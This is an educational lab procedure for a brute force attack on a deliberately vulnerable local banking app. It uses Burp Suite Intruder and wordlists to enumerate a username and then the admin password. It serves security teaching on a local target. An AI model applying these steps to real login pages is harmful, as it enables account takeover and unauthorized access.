Virtual Labs

Computer Science and Engineering > Computer Networks Lab > Experiments

Brute Force Attack on Login Page

Procedure

Prerequisites: Python 3, Burp Suite Community Edition, a web browser.

Setup

Step 1: Start the Target Web Application

Clone the repository and start the Flask application. The vulnerable web application (SecureBank) will be running on http://127.0.0.1:5000. Navigate to the home page to verify it is working.

Step 2: Configure Burp Suite Proxy

Open Burp Suite and ensure the proxy listener is running on 127.0.0.1:8080. Open the Burp Suite built-in browser (or configure your browser to use Burp as a proxy). Navigate to the login page at http://127.0.0.1:5000/login.

Step 3: Capture a Login Request

Turn on Intercept in Burp Suite's Proxy tab. Enter any dummy credentials (e.g., test / test) in the login form and click Submit. Burp Suite captures the POST request containing username=test&password=test.

Phase 1 — Username Enumeration

Step 4: Send Request to Intruder

Right-click the captured POST request in Burp Suite and select Send to Intruder. Navigate to the Intruder tab.

Step 5: Configure Payload Position

In the Positions tab, click Clear § to remove all auto-marked positions. Highlight the value of the username parameter (e.g., test) and click Add §. The request body should read: username=§test§&password=test. Set attack type to Sniper.

Step 6: Load Username Wordlist

Go to the Payloads tab. Set payload type to Simple list. Click Load and select the username.txt wordlist file containing common usernames.

Step 7: Run the Attack and Analyze

Click Start Attack. Observe the results — most usernames return HTTP 404 (not found). The valid admin username returns HTTP 220 (incorrect password). Sort by the Status column to quickly identify the different response.

Phase 2 — Password Enumeration

Step 8: Reconfigure Payload Position

Go back to the Positions tab. Click Clear §. Set the username to the discovered admin username. Highlight the password value and click Add §. The request body should read: username=admin&password=§test§.

Step 9: Load Password Wordlist

Go to the Payloads tab. Clear the previous payloads. Click Load and select the passwd.txt wordlist file containing common passwords.

Step 10: Run the Attack and Find the Password

Click Start Attack. Most passwords return HTTP 220 (incorrect password). The correct admin password returns HTTP 210 (successful login). Sort by Status to identify the correct password.

Verification

Step 11: Login as Admin

Navigate to the login page. Enter the discovered admin credentials. Upon successful login, you are redirected to the Admin Dashboard, confirming the brute force attack was successful.